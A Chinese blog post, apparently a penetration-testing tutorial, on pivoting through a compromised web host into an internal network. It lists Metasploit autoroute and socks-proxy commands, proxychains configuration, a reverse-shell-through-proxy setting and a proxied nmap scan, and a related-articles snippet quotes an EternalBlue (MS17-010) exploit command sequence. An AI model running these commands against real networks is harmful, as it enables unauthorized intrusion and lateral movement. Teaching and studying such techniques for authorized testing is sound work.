内网渗透之跨路由访问

最新推荐文章于 2023-12-25 16:05:44 发布
最新推荐文章于 2023-12-25 16:05:44 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127894456
版权

内网渗透之跨路由访问

在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网, 如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透

如下图

在这里插入图片描述

kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做 跳板访问目标主机 获取内网网卡命令

run get_local_subnets

绑定路由 不绑定路由就没法访问目标主机

run autoroute -s 10.10.10.0/24
route add 10.10.10.0 255.255.255.0 1
route list

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s2egWfa5-1668607161473)(C:\Users\lenovo\Desktop\2.png)]

msf使用隧道模块 默认是使用socks5 也可以选择socks4a

use auxiliary/server/socks_proxy

编辑隧道配置文件

sudo vi /etc/proxychains4.conf

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-00kDC8dN-1668607161473)(C:\Users\lenovo\Desktop\3.png)]

msf 使用代理访问目标

setg Proxies socks4/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置)
setg Proxies socks5:192.168.1.53:1080
set ReverseAllowProxy true
#允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)

使用代理隧道nmap扫描内网主机

proxychains4 nmap 10.10.10.136 -sT -A -p 445

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gb6cokl9-1668607161474)(C:\Users\lenovo\Desktop\4.png)]
在这里插入图片描述

末将于禁,愿为曹家世代赴汤蹈火。

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【CS学习笔记】20、通过Socks转发的方法
TeamsSix 的 CSDN 空间
09-05 1758
0x00 前言 这一小节中,将看看如何构建一个 SOCKS 代理服务器使一个上线主机变成我们的跳板机。 0x01 Pivoting 根据 A-Team 团队中 CS 手册中的介绍,Pivoting 是指 将一个受害机器转为其他攻击和工具的跳板 的操作。 在进行 Pivoting 操作之前,需要将当前会话改为交互模式,也就是说输入命令就被执行,执行 sleep 0 即为交互模式。 0x02 Socks 在当前 beacon 上可以右击选择 Pivoting --> SOCKS Server 设
metasploit进阶
mingyqf的博客
02-28 817
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
内网渗透之多种方式实现内网穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
内网MSF--从入门到熟练
最新发布
qq_53003652的博客
12-25 1248
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
热门推荐
weixin_42109829的博客
01-18 1万+
0x01 前言 当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。 初级–》frp代理了解 进阶–》多层代理 0x02 靶场环境 靶场搭建 0x03 frp简易配置 frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序, 下载地址 https://github.com/fatedier/frp/releases/tag/v0.38.0 一、
手机没Root?你照样可以渗透路由
weixin_34191734的博客
08-15 1020
和Metasploit差不多,RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞,它还有个亮点,就是可以在绝大多数安卓设备上运行。 如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞的路由器,你就可以渗透他们。 RouterSploit vs 路...
同局域网下如何路由访问
weixin_44061195的博客
06-13 5600
典型状况:存在两个路由器,路由器2是在路由器1下,则电脑2怎么访问电脑 IP地址如上图所示,本人设置方法。 路由器2打开DMZ,本人小米路由器 电脑则可以通过ip:192.168.0.101访问电脑2
路由渗透和路由泄露
weixin_65551798的博客
07-11 998
因为没有路由泄露之前,r1去往r4的时候是从上面开销值比较大的地方走,但是这个路由表中,不仅有开始的默认路由,现在又多了一些明细路由,虽说路由泄露进来的路由能够感知cost,但是比默认路由小但是,,因为最长掩码匹配原则,他会选择掩码比较长的那一个。因为在r2和r3上都做了路由过滤,在路由过滤调用的acl中,只允许了去往10.0.234.0网段的路由,并且在路由协议上调用acl,在下面默认有一条拒绝所有,所以路由表里面只有这一条路由。但是因为路由泄露把骨干区域所有的路由都进行传递进来了,安全性大度降低。
ONE DAY |网络安全渗透测试之网段攻击
EverUP
05-04 1801
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
HCIE学习笔记(1)之ISIS路由渗透
qi__yuan的博客
03-28 5524
文章目录前言一、ISIS路由渗透作用二、相关实验1.普通的ISIS渗透2.成环状的ISIS渗透总结 前言 关于ISIS如有渗透的相关内容,记录学习ISIS的相关心得。 一、ISIS路由渗透作用 通常情况下,Level-1区域内的路由通过Level-1路由器进行管理。所有的Level-2和Level-1-2路由器构成一个连续的骨干区域。Level-1区域必须且只能与骨干区域相连,不同的Level-1区域之间并不相连。 Level-1-2路由器将学习到的Level-1路由信息装进Level-2 LSP,再泛
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
电脑教程内网渗透之内网穿透.rar
10-25
电脑教程内网渗透之内网穿透
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透之常见命令
03-14
内网渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
Cobalt Strike(十三)内网隧道通信
qq_56426046的博客
09-25 333
正向连接sleep 0。
ISIS路由渗透实验
将勤补拙
12-07 8046
1.组网要求 网络中的6太路由器的配置了ISIS路由协议,AR1,AR2,作为Level-1路由器,AR3,AR4,作为Level-1/2路由器,属于Area10.。AR5,AR6作为 Level-2路由器属于Area20。除了 AR3上G0/0/1接口的开销值被设为40,其他所有接口的开销值都为缺省值10。要求将Leve2区域中的路由信息渗透到Leve|-1区域,使得 AR1到 Router的路...
从零开始学网安:Day3 体验网段渗透与后渗透经验分享
无业de小白的博客
05-07 369
这一次分享一些网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
is-is实验-路由渗透(ip)
PAOMIAN_HAOCHI的博客
12-02 715
r1 [r1]isis 1 [r1-isis-1]net [r1-isis-1]network-entity 49.0001.1111.1111.1111.00 Nov 30 2021 10:19:49-08:00 r1 %%01ISIS/4/START_ENABLE_ISIS(l)[0]:ISIS 256 enable d all ISIS modules. [r1-isis-1]q [r1]int lo0 [r1-LoopBack0]isis enable 1 [r1-LoopBack0]q.
python内网渗透
10-24
Python内网渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值